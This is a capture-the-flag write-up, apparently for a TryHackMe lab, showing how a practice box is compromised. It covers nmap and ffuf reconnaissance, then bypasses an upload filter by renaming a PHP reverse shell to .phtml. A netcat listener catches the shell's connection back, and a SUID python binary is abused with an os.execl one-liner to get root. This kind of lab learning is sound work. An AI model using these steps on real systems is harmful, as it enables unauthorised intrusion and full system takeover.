![[Pasted image 20250629130650.png]] # Information Gathering - Nmap Scanning all 65,535 TCP ports and found 2 open ports: 22 and 80 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:35 CDT Nmap scan report for 10.10.225.13 Host is up (0.13s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds ``` Ran another scan but this time with `-sC` and `-sV` options for more detailed information about those 2 open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:36 CDT Nmap scan report for 10.10.225.13 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA) | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA) |_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: HackIT - Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds ``` Lastly I performed a udp scan against top 1,000 ports but found no open ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:38 CDT Nmap scan report for 10.10.225.13 Host is up (0.13s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 207/udp closed at-7 1059/udp closed nimreg 19541/udp closed jcp 21902/udp closed unknown 49194/udp closed unknown 62699/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds ``` --- # Footprinting ##### Port 80 I opened up my browser to see the web page on port 80. Below is all I saw. I couldn't find any useful information. ![[Pasted image 20250629123951.png]] I used `ffuf` to enumerate directories and this directory named `panel` stood out to me. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ffuf -u http://$IP/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ac /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.225.13/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : true :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ .htaccessZhUoKYjp [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 131ms] <SNIP> uploads [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 239ms] <SNIP> css [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 128ms] js [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 127ms] panel [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 128ms] ``` The `/panel` page appears to be a place where files can be uploaded. We also discovered `/uploads` directory using the ffuf tool, and I suspect that the files uploaded through `/panel` are likely stored in the `/uploads` directory. ![[Pasted image 20250629125019.png]] I tried uploading `Pentest Monkey`'s php-reverse-shell.php file but it seems the web server is not accepting `.php` files. ![[Pasted image 20250629125527.png]] I wasn't sure how strictly file filtering was enforced for uploads at this point, so I changed the file extension from `.php` to `phtml` and tried uploading it again -- and it worked! ![[Pasted image 20250629125750.png]] I browsed to `/uploads` and the file we just uploaded was there. ![[Pasted image 20250629125827.png]] Successfully connected to the reverse shell :) ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.225.13] 60002 Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 17:58:31 up 25 min, 0 users, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data ``` Got the `user.txt` flag in `/var/www` ```bash www-data@rootme:/var/www$ cat user.txt THM{y0... ``` --- # Privilege Escalation To access `/root` and obtain the `root.txt` flag, I needed to elevate my privileges. I looked for files with the `SUID` bit set. ```bash www-data@rootme:/var/www$ find / -type f -perm -4000 2>/dev/null <SNIP> ... /usr/bin/newuidmap /usr/bin/newgidmap /usr/bin/chsh /usr/bin/python /usr/bin/at /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/bin/newgrp /usr/bin/passwd /usr/bin/pkexec /snap/core/8268/bin/mount ... <SNIP> ... /bin/mount /bin/su /bin/fusermount /bin/ping /bin/umount ``` `/usr/bin/python` binary stood out to me because If Python binary has SUID bit set to it, I thought I could take advantage of that and easily get a shell. `gtfobins.github.io` confirmed it. ![[Pasted image 20250629130622.png]] Got the `root.txt` flag! ```bash ", "-p")'rootme:/var/www$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh # whoami root # cd /root # ls root.txt # cat root.txt THM{pr... ```